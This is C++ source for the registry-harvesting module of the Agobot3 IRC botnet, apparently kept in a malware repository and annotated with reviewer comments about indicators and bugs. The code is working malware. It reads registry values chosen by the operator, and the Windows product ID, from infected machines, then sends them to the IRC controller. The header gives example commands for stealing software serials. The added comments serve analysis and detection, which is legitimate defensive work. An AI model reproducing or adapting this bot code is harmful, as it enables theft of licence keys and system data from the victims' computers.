forked from malwares/Botnet
harvest_registry.cpp
/* Agobot3 - a modular IRC bot for Win32 / Linux
Copyright (C) 2003 Ago
This program is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
as published by the Free Software Foundation; either version 2
of the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */
/*
!harvest.registry Software\\Microsoft\\Windows\\CurrentVersion ProductId
!harvest.registry SOFTWARE\\Adobe\\Photoshop\\7.0\\Registration SERIAL
finally fixed the space problem but you must use quotes like this.
<@ytrewq> !harvest.registry "Software\Axialis\Internet Access" "ProxyPort"
<+ya3n2sj> Found registry Info from HKEY_CURRENT_USER: (8333).
*/
#include "main.h"
#include "mainctrl.h"
#include "harvest_registry.h"
// Registers this module's two bot commands, "harvest.registry" and
// "harvest.windowskeys", each with a help string and this object as the last
// argument. REGCMD is a macro defined outside this file, so what registration
// involves and what the `false` argument means are not visible here.
// NOTE(review): the command names and help texts are passed as string literals,
// so they are likely present verbatim in a built sample and usable as static
// indicators - confirm against the binary, REGCMD may transform them.
void CHarvest_Registry::Init()
{
REGCMD(m_cmdRegistry, "harvest.registry", "makes the bot get registry info from exact registry path", false, this);
REGCMD(m_cmdWindowsKeys, "harvest.windowskeys", "makes the bot get windows registry info", false, this);
}
// Handles the two commands registered in Init(). Both branches do work only on
// WIN32 builds; on other targets they compile to empty blocks.
//
//   harvest.registry <subkey> <value>
//       Tokens 1 and 2 of pMsg->sChatString (split on " ") are used, without any
//       validation, as a registry subkey path and a value name. The value is
//       looked up under five root hives in turn and every successful read is
//       sent to pMsg->sReplyTo through g_pMainCtrl->m_cIRC.SendFormat.
//   harvest.windowskeys
//       Reads the fixed value "ProductId" under
//       HKEY_LOCAL_MACHINE "Software\\Microsoft\\Windows\\CurrentVersion" and
//       sends it the same way.
//
// pMsg: the parsed message; this function reads sCmd, sChatString, bSilent,
//       bNotice and sReplyTo from it.
// Returns true unconditionally, also when sCmd matched neither command.
//
// NOTE(review): no sender or authorisation check happens in this function;
// whether the dispatcher performs one before calling it is not visible here.
// NOTE(review): the reply format strings ("Found registry Info from ..." and
// "Found Windows Product ID (%s).") are fixed literals, which makes them
// candidate content indicators for binaries and for captured bot traffic.
bool CHarvest_Registry::HandleCommand(CMessage *pMsg)
{
// A zero result from Compare is treated as a match - presumably strcmp-style,
// confirm against the string class.
if(!pMsg->sCmd.Compare("harvest.registry"))
{
#ifdef WIN32
HKEY hkey=NULL;
DWORD dwSize=128;
// Fixed 128-byte receive buffer, never initialised and reused for every hive.
unsigned char szDataBuf[128];
// lRet is assigned here and in every block below but never tested: if the open
// fails, the query and the close that follow still run on whatever hkey holds.
LONG lRet=RegOpenKeyEx(HKEY_CURRENT_USER, pMsg->sChatString.Token(1, " ", false).CStr(), 0, KEY_READ, &hkey);
// lpType is NULL, so the value's type is never checked, yet the data is always
// formatted with %s. Non-string values, and strings stored without a terminating
// NUL, can therefore show up as garbage or run past the returned data in the
// reply. Values larger than 128 bytes make the query fail with ERROR_MORE_DATA
// and produce no reply at all - relevant when interpreting captured output.
if(RegQueryValueEx(hkey, pMsg->sChatString.Token(2, " ", false).CStr(), NULL, NULL, szDataBuf, &dwSize)==ERROR_SUCCESS)
g_pMainCtrl->m_cIRC.SendFormat(pMsg->bSilent, pMsg->bNotice, pMsg->sReplyTo.Str(), \
"Found registry Info from HKEY_CURRENT_USER: (%s).", szDataBuf);
RegCloseKey(hkey);
///////////
// Same lookup under HKEY_LOCAL_MACHINE. dwSize is reset because the previous
// query overwrote it; hkey is not reset and may still hold the handle value
// that was just closed if this open fails.
dwSize = 128; lRet = RegOpenKeyEx(HKEY_LOCAL_MACHINE, pMsg->sChatString.Token(1, " ", false).CStr(), 0, KEY_READ, &hkey);
if(RegQueryValueEx(hkey, pMsg->sChatString.Token(2, " ", false).CStr(), NULL, NULL, szDataBuf, &dwSize)== ERROR_SUCCESS)
g_pMainCtrl->m_cIRC.SendFormat(pMsg->bSilent, pMsg->bNotice, pMsg->sReplyTo.Str(), \
"Found registry Info from HKEY_LOCAL_MACHINE: (%s).", szDataBuf);
RegCloseKey(hkey);
//////////////
// Same lookup under HKEY_CURRENT_CONFIG.
dwSize = 128; lRet = RegOpenKeyEx(HKEY_CURRENT_CONFIG, pMsg->sChatString.Token(1, " ", false).CStr(), 0, KEY_READ, &hkey);
if(RegQueryValueEx(hkey, pMsg->sChatString.Token(2, " ", false).CStr(), NULL, NULL, szDataBuf, &dwSize)== ERROR_SUCCESS)
g_pMainCtrl->m_cIRC.SendFormat(pMsg->bSilent, pMsg->bNotice, pMsg->sReplyTo.Str(), \
"Found registry Info from HKEY_CURRENT_CONFIG: (%s).", szDataBuf);
RegCloseKey(hkey);
/////////////////
// Same lookup under HKEY_CLASSES_ROOT.
dwSize = 128; lRet = RegOpenKeyEx(HKEY_CLASSES_ROOT, pMsg->sChatString.Token(1, " ", false).CStr(), 0, KEY_READ, &hkey);
if(RegQueryValueEx(hkey, pMsg->sChatString.Token(2, " ", false).CStr(), NULL, NULL, szDataBuf, &dwSize)== ERROR_SUCCESS)
g_pMainCtrl->m_cIRC.SendFormat(pMsg->bSilent, pMsg->bNotice, pMsg->sReplyTo.Str(), \
"Found registry Info from HKEY_CLASSES_ROOT: (%s).", szDataBuf);
RegCloseKey(hkey);
/////////////////////
// Same lookup under HKEY_USERS, the last of the five hives tried.
dwSize = 128; lRet = RegOpenKeyEx(HKEY_USERS, pMsg->sChatString.Token(1, " ", false).CStr(), 0, KEY_READ, &hkey);
if(RegQueryValueEx(hkey, pMsg->sChatString.Token(2, " ", false).CStr(), NULL, NULL, szDataBuf, &dwSize)== ERROR_SUCCESS)
g_pMainCtrl->m_cIRC.SendFormat(pMsg->bSilent, pMsg->bNotice, pMsg->sReplyTo.Str(), \
"Found registry Info from HKEY_USERS: (%s).", szDataBuf);
RegCloseKey(hkey);
#endif // WIN32
}
/*
your friend needs some windows keys and you found that you can't get them because of your setting in config.
This is backup ;)
Glow
*/
// Not an else-branch: this comparison runs even after "harvest.registry" matched.
if(!pMsg->sCmd.Compare("harvest.windowskeys"))
{
#ifdef WIN32
HKEY hkey=NULL;
DWORD dwSize=128;
unsigned char szDataBuf[128];
// Fixed key and value name - nothing in this branch comes from the operator's
// message. As above, lRet is never tested and the value type is not checked
// before the data is formatted with %s.
dwSize = 128; LONG lRet = RegOpenKeyEx(HKEY_LOCAL_MACHINE, "Software\\Microsoft\\Windows\\CurrentVersion", 0, KEY_READ, &hkey);
if(RegQueryValueEx(hkey, "ProductId", NULL, NULL, szDataBuf, &dwSize)== ERROR_SUCCESS)
g_pMainCtrl->m_cIRC.SendFormat(pMsg->bSilent, pMsg->bNotice, pMsg->sReplyTo.Str(), \
"Found Windows Product ID (%s).", szDataBuf);
RegCloseKey(hkey);
#endif // WIN32
}
// Always reports success, whether or not a command matched or a read succeeded.
return true;
}